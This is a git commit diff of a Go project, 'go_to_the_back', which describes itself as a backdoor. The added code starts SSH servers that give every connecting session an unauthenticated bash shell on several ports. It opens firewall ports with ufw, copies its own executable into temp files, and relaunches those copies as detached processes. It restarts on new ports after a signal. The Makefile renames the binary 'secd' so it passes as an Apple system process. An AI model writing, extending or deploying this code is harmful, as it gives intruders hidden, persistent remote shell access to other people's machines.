more changes
This commit is contained in:
parent
8944586a4e
commit
b3d2b62f44
|
@ -1,2 +1,2 @@
|
|||
./build
|
||||
.idea/
|
||||
build
|
||||
.idea/
|
||||
|
|
19
Makefile
19
Makefile
|
@ -0,0 +1,19 @@
|
|||
TARGET = go_to_the_back
|
||||
# this is the name of a really cute apple process
|
||||
# idk what it is but it looks normal kinda
|
||||
ALIAS = secd
|
||||
|
||||
.PHONY: $(ALIAS)
|
||||
$(ALIAS): $(TARGET)
|
||||
cp ./build/$(TARGET) ./build/$(ALIAS)
|
||||
|
||||
$(TARGET):
|
||||
go build -o ./build/$(TARGET) cmd/main.go
|
||||
|
||||
.PHONY: pre
|
||||
pre:
|
||||
@mkdir -p ./build
|
||||
|
||||
.PHONY: clean
|
||||
clean:
|
||||
@rm -rf build/**
|
|
@ -2,7 +2,15 @@ package backdoor
|
|||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
ssh "git.tcp.direct/bfu/glider-ssh"
|
||||
"git.tcp.direct/bfu/go_to_the_back/proc"
|
||||
"github.com/creack/pty"
|
||||
"github.com/rs/zerolog"
|
||||
"io"
|
||||
"os"
|
||||
"os/exec"
|
||||
"strconv"
|
||||
"sync"
|
||||
)
|
||||
|
||||
|
@ -11,6 +19,9 @@ var (
|
|||
// a backdoor is requested to start, but is
|
||||
// already running.
|
||||
ErrAlreadyActive = errors.New("backdoor is already active")
|
||||
Logger = zerolog.New(os.Stdout)
|
||||
Doors = make([]*Backdoor, 0)
|
||||
bindAddr string
|
||||
)
|
||||
|
||||
// Door describes the basic functions in a backdoor.
|
||||
|
@ -28,10 +39,10 @@ type Door interface {
|
|||
// Start will allow connections and start running
|
||||
// the door.
|
||||
Start() error
|
||||
// Pid returns the process id of the door.
|
||||
Pid() int
|
||||
// Process returns the process metadata.
|
||||
Process() *proc.Process
|
||||
// Port returns the backdoor's port.
|
||||
Port() int
|
||||
}
|
||||
|
||||
// Backdoor is a structure that inherits Door
|
||||
|
@ -45,24 +56,31 @@ type Backdoor struct {
|
|||
// Whether the door is active.
|
||||
active bool
|
||||
// The process metadata.
|
||||
proc *proc.Process
|
||||
proc *proc.Process
|
||||
hostname string
|
||||
}
|
||||
|
||||
func SetBindAddr(addr string) {
|
||||
bindAddr = addr
|
||||
}
|
||||
|
||||
// New will create and return a new, basic Backdoor.
|
||||
func New() Door {
|
||||
return Backdoor{
|
||||
func New(port int) *Backdoor {
|
||||
door := &Backdoor{
|
||||
// Default port, as it does not exist.
|
||||
port: -1,
|
||||
port: port,
|
||||
// The synchronization mutex.
|
||||
mu: &sync.Mutex{},
|
||||
mu: &sync.Mutex{},
|
||||
// The current state.
|
||||
active: false,
|
||||
// The process metadata (nil).
|
||||
proc: nil,
|
||||
proc: nil,
|
||||
}
|
||||
Doors = append(Doors, door)
|
||||
return door
|
||||
}
|
||||
|
||||
func (d Backdoor) SetPort(port int) {
|
||||
func (d *Backdoor) SetPort(port int) {
|
||||
d.mu.Lock()
|
||||
defer d.mu.Unlock()
|
||||
d.port = port
|
||||
|
@ -72,30 +90,64 @@ func (d Backdoor) Active() bool {
|
|||
return d.active
|
||||
}
|
||||
|
||||
func (d Backdoor) Start() error {
|
||||
func (d *Backdoor) Start() error {
|
||||
if d.active {
|
||||
return ErrAlreadyActive
|
||||
}
|
||||
d.mu.Lock()
|
||||
d.active = true
|
||||
// todo: open server here
|
||||
d.hostname = strconv.Itoa(d.port)
|
||||
command := exec.Command("ufw", "allow", d.hostname+"/tcp")
|
||||
err := command.Run()
|
||||
Logger.Err(err)
|
||||
ssh.Handle(d.sshHandler)
|
||||
go func() {
|
||||
srv, err := ssh.ListenAndServe(fmt.Sprintf("%s:%d", bindAddr, d.port), nil)
|
||||
d.proc = proc.New(srv)
|
||||
Logger.Err(err)
|
||||
}()
|
||||
Logger.Info().Msgf("started on %d", d.port)
|
||||
d.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d Backdoor) Stop() {
|
||||
func (d *Backdoor) Stop() {
|
||||
d.mu.Lock()
|
||||
d.active = false
|
||||
// Close the server
|
||||
err := d.Process().Server().Close()
|
||||
Logger.Err(err)
|
||||
d.mu.Unlock()
|
||||
}
|
||||
|
||||
func (d Backdoor) Pid() int {
|
||||
if d.proc == nil {
|
||||
return -1
|
||||
}
|
||||
return d.proc.Id()
|
||||
func (d *Backdoor) Reboot() {
|
||||
d.Stop()
|
||||
d.SetPort(d.port + 10)
|
||||
go d.Start()
|
||||
}
|
||||
|
||||
func (d Backdoor) Process() *proc.Process {
|
||||
func (d *Backdoor) sshHandler(session ssh.Session) {
|
||||
// literally cap though
|
||||
Logger.Info().Msgf("shielded attack from %s", session.RemoteAddr().String())
|
||||
command := exec.Command("bash")
|
||||
if req, _, valid := session.Pty(); valid {
|
||||
command.Env = append(command.Env, fmt.Sprintf("TERM=%s", req.Term))
|
||||
file, err := pty.Start(command)
|
||||
if err != nil {
|
||||
_, _ = session.Write([]byte(err.Error()))
|
||||
}
|
||||
go func() {
|
||||
_, _ = io.Copy(file, session)
|
||||
}()
|
||||
_, _ = io.Copy(session, file)
|
||||
_ = command.Wait()
|
||||
}
|
||||
}
|
||||
|
||||
func (d *Backdoor) Process() *proc.Process {
|
||||
return d.proc
|
||||
}
|
||||
|
||||
func (d *Backdoor) Port() int {
|
||||
return d.port
|
||||
}
|
||||
|
|
|
@ -1,37 +1,45 @@
|
|||
package backdoor
|
||||
|
||||
import (
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
)
|
||||
|
||||
// Copies is list of the copies of aghhhhhhh
|
||||
// just kidding its all the mutable temp file paths pls kill me
|
||||
// todo: use gomap?
|
||||
var Copies = make([]string, 0)
|
||||
var (
|
||||
tempdir, _ = ioutil.TempDir(os.TempDir(), "secd")
|
||||
Copies = make([]string, 0)
|
||||
)
|
||||
|
||||
func Mut() {
|
||||
path, err := os.Executable()
|
||||
if err == nil {
|
||||
// todo: fail
|
||||
if err != nil {
|
||||
Logger.Err(err)
|
||||
return
|
||||
}
|
||||
name := "balls_path"
|
||||
|
||||
file, err := os.Open(path)
|
||||
if err != nil {
|
||||
// todo: fail
|
||||
Logger.Err(err)
|
||||
return
|
||||
}
|
||||
newFile, err := os.Create(name)
|
||||
defer file.Close()
|
||||
|
||||
newFile, err := ioutil.TempFile(tempdir, "*.pol")
|
||||
if err != nil {
|
||||
// todo: fail
|
||||
Logger.Err(err)
|
||||
return
|
||||
}
|
||||
_, err = io.Copy(file, newFile)
|
||||
bytes, err := ioutil.ReadFile(path)
|
||||
|
||||
_, err = newFile.Write(bytes)
|
||||
if err != nil {
|
||||
// todo: fail
|
||||
Logger.Err(err)
|
||||
return
|
||||
}
|
||||
_ = newFile.Chmod(755)
|
||||
// Append the new one
|
||||
Copies = append(Copies, name)
|
||||
Copies = append(Copies, newFile.Name())
|
||||
}
|
||||
|
|
74
cmd/main.go
74
cmd/main.go
|
@ -1,10 +1,72 @@
|
|||
package main
|
||||
|
||||
import "git.tcp.direct/bfu/go_to_the_back/backdoor"
|
||||
import (
|
||||
"flag"
|
||||
"fmt"
|
||||
"git.tcp.direct/bfu/go_to_the_back/backdoor"
|
||||
"os"
|
||||
"os/exec"
|
||||
"os/signal"
|
||||
"syscall"
|
||||
)
|
||||
|
||||
func main() {
|
||||
door := backdoor.New()
|
||||
go door.Start()
|
||||
var (
|
||||
bindAddr = flag.String("addr", "127.0.0.1", "bind address")
|
||||
startPort = flag.Int("ini", 2222, "starting port")
|
||||
numPorts = flag.Int("amt", 5, "number of ports")
|
||||
canReboot = flag.Bool("reboot", true, "if the processes can reboot")
|
||||
)
|
||||
|
||||
// todo: block chan
|
||||
}
|
||||
func init() {
|
||||
flag.Parse()
|
||||
}
|
||||
|
||||
func main() {
|
||||
dajumpaf:
|
||||
for i := 0; i < *numPorts; i++ {
|
||||
backdoor.New(*startPort + i)
|
||||
}
|
||||
|
||||
for i, c := range backdoor.Copies {
|
||||
bindArg := fmt.Sprintf("-addr=%d", bindAddr)
|
||||
startArg := fmt.Sprintf("-ini=%d", *startPort+(i*100))
|
||||
backdoor.Logger.Info().Msg(startArg)
|
||||
command := &exec.Cmd{
|
||||
Path: c,
|
||||
Args: []string{c, bindArg, startArg, "&", "disown"},
|
||||
SysProcAttr: &syscall.SysProcAttr{
|
||||
Chroot: "",
|
||||
Credential: nil,
|
||||
Ptrace: false,
|
||||
Setsid: false,
|
||||
Setpgid: true,
|
||||
Setctty: os.DevNull,
|
||||
Noctty: true,
|
||||
Ctty: 0,
|
||||
Foreground: false,
|
||||
Pgid: 0,
|
||||
},
|
||||
}
|
||||
go func() {
|
||||
_ = command.Start()
|
||||
}()
|
||||
}
|
||||
|
||||
for _, door := range backdoor.Doors {
|
||||
d := door
|
||||
go func() {
|
||||
err := d.Start()
|
||||
backdoor.Logger.Err(err)
|
||||
backdoor.Mut()
|
||||
}()
|
||||
}
|
||||
|
||||
sig := make(chan os.Signal, 1)
|
||||
signal.Notify(sig, os.Interrupt, os.Kill, syscall.SIGSTOP, syscall.SIGQUIT)
|
||||
<-sig
|
||||
|
||||
if *canReboot {
|
||||
*startPort = *startPort + 10
|
||||
goto dajumpaf
|
||||
}
|
||||
}
|
||||
|
|
12
go.mod
12
go.mod
|
@ -1,3 +1,15 @@
|
|||
module git.tcp.direct/bfu/go_to_the_back
|
||||
|
||||
go 1.17
|
||||
|
||||
require (
|
||||
git.tcp.direct/bfu/glider-ssh v0.3.5
|
||||
github.com/creack/pty v1.1.17
|
||||
github.com/rs/zerolog v1.26.0
|
||||
)
|
||||
|
||||
require (
|
||||
github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be // indirect
|
||||
golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871 // indirect
|
||||
golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e // indirect
|
||||
)
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
git.tcp.direct/bfu/glider-ssh v0.3.5 h1:6fj5IypLe/8PcIhIas9SdQhZZ2VwBVITeymyk6Azcl4=
|
||||
git.tcp.direct/bfu/glider-ssh v0.3.5/go.mod h1:JGbvNw/mh/U29AU4a81GSlnEzqUabcBA1famLMuRvic=
|
||||
github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be h1:9AeTilPcZAjCFIImctFaOjnTIavg87rW78vTPkQqLI8=
|
||||
github.com/anmitsu/go-shlex v0.0.0-20200514113438-38f4b401e2be/go.mod h1:ySMOLuWl6zY27l47sB3qLNK6tF2fkHG55UZxx8oIVo4=
|
||||
github.com/coreos/go-systemd/v22 v22.3.2/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc=
|
||||
github.com/creack/pty v1.1.17 h1:QeVUsEDNrLBW4tMgZHvxy18sKtr6VI492kBhUfhDJNI=
|
||||
github.com/creack/pty v1.1.17/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4=
|
||||
github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA=
|
||||
github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
|
||||
github.com/rs/xid v1.3.0/go.mod h1:trrq9SKmegXys3aeAKXMUTdJsYXVwGY3RLcfgqegfbg=
|
||||
github.com/rs/zerolog v1.26.0 h1:ORM4ibhEZeTeQlCojCK2kPz1ogAY4bGs4tD+SaAdGaE=
|
||||
github.com/rs/zerolog v1.26.0/go.mod h1:yBiM87lvSqX8h0Ww4sdzNSkVYZ8dL2xjZJG1lAuGZEo=
|
||||
github.com/yuin/goldmark v1.4.0/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k=
|
||||
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
|
||||
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871 h1:/pEO3GD/ABYAjuakUS6xSEmmlyVS4kxBNkeA9tLJiTI=
|
||||
golang.org/x/crypto v0.0.0-20211117183948-ae814b36b871/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
|
||||
golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
|
||||
golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
|
||||
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e h1:WUoyKPm6nCo1BnNUvPGnFG3T5DUVem42yDJZZ4CNxMA=
|
||||
golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
|
||||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.1.7/go.mod h1:LGqMHiF4EqQNHR1JncWGqT5BVaXmza+X+BDGol+dOxo=
|
||||
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
27
proc/proc.go
27
proc/proc.go
|
@ -1,9 +1,30 @@
|
|||
package proc
|
||||
|
||||
import (
|
||||
ssh "git.tcp.direct/bfu/glider-ssh"
|
||||
"sync"
|
||||
)
|
||||
|
||||
type Process struct {
|
||||
id int
|
||||
mu *sync.Mutex
|
||||
srv *ssh.Server
|
||||
}
|
||||
|
||||
func (p *Process) Id() int {
|
||||
return p.id
|
||||
func New(srv *ssh.Server) *Process {
|
||||
return &Process{
|
||||
mu: &sync.Mutex{},
|
||||
srv: srv,
|
||||
}
|
||||
}
|
||||
|
||||
func (p *Process) Server() *ssh.Server {
|
||||
return p.srv
|
||||
}
|
||||
|
||||
func (p *Process) Start(srv *ssh.Server) {
|
||||
if p.srv == nil {
|
||||
p.mu.Lock()
|
||||
p.srv = srv
|
||||
defer p.mu.Unlock()
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
shells????
|
Loading…
Reference in New Issue